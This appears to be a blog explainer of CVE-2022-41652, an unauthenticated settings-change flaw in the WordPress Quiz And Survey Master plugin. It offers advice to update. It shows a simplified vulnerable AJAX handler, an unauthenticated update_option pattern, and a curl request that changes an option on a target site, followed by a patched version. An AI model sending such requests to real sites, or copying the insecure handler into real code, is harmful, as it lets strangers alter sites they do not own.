If you use WordPress to run quizzes or surveys, you might be using the Quiz And Survey Master (QSM) plugin. This plugin helps you create engaging quizzes for your site. Unfortunately, until version 7.3.10, QSM had a serious security issue: CVE-2022-41652. In this long post, I’ll break down what happened, show you some code, explain the exploit, and help you stay safe.
What Is CVE-2022-41652?
CVE-2022-41652 is a bypass vulnerability found in the Quiz And Survey Master plugin (versions 7.3.10 and earlier). It allows unauthenticated users—meaning anyone on the Internet—to bypass certain checks and perform actions they shouldn’t.
The original advisory is here:
- Patchstack CVE-2022-41652 Advisory
- NVD Documentation
Why Does This Matter?
If exploited, an attacker could potentially change critical plugin settings on your WordPress site without logging in. Imagine some stranger on the Web being able to tweak your quiz settings, change user permissions, or even cause your site to misbehave.
Where’s the Bug?
The problem lies with QSM not properly checking permissions before allowing certain AJAX calls that update plugin options. In simple terms, the plugin lets anyone (not just admins) send these background requests and change settings.
Here’s a simplified look at the problematic code (from /quiz-master-next/php/ajax.php in older versions):
add_action('wp_ajax_qsm_save_options', 'qsm_save_options');
add_action('wp_ajax_nopriv_qsm_save_options', 'qsm_save_options');
function qsm_save_options() {
// No authentication check!
$option = $_POST['option'];
$value = $_POST['value'];
update_option($option, $value); // Dangerous! Anyone can change plugin settings.
echo json_encode(['success' => true]);
wp_die();
}
Notice that wp_ajax_nopriv_qsm_save_options allows both logged-in and not-logged-in users. There are *no* permission checks! This is what makes the bug so easy to exploit.
Here’s example code using curl
curl -X POST https://victimsite.com/wp-admin/admin-ajax.php \
-d 'action=qsm_save_options&option=qsm_some_option&value=malicious_value'
What happens?
If the site is vulnerable, the qsm_some_option setting gets changed to malicious_value, with NO login required.
Change plugin settings to open more vulnerabilities
- Enable/disable quizzes at will
Site Disruption: Attackers can make your quizzes misbehave or disappear.
- Open the door for more attacks: If they enable rogue settings, further exploitation could follow.
How Did QSM Fix It?
The developers quickly patched it in version 7.3.11. They made sure that only *authenticated users with proper permissions* can call sensitive AJAX actions.
Updated code might look like
function qsm_save_options() {
if(!current_user_can('manage_options')){
wp_send_json_error('Permission Denied', 403);
wp_die();
}
$option = $_POST['option'];
$value = $_POST['value'];
update_option($option, $value);
echo json_encode(['success' => true]);
wp_die();
}
If your site uses QSM, update immediately to at least version 7.3.11!
- Download the latest version here
Resources and References
- Patchstack Original Report
- NVD CVE-2022-41652
- Plugin Changelog
Conclusion
CVE-2022-41652 is a reminder that plugins can have serious flaws—even popular ones. Always keep your WordPress plugins up to date. If you run Quiz And Survey Master, update now, and stay safe!
If you need help, ask a trusted developer or your hosting provider to check your site security.
Exclusive insight: If you stick with plugins that are well-maintained and always read changelogs, you’ll catch issues like this before they catch you. Security is best when it’s a habit, not an afterthought.
*Stay secure, keep learning, and share this info with your fellow WordPress users!*
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:10:00 UTC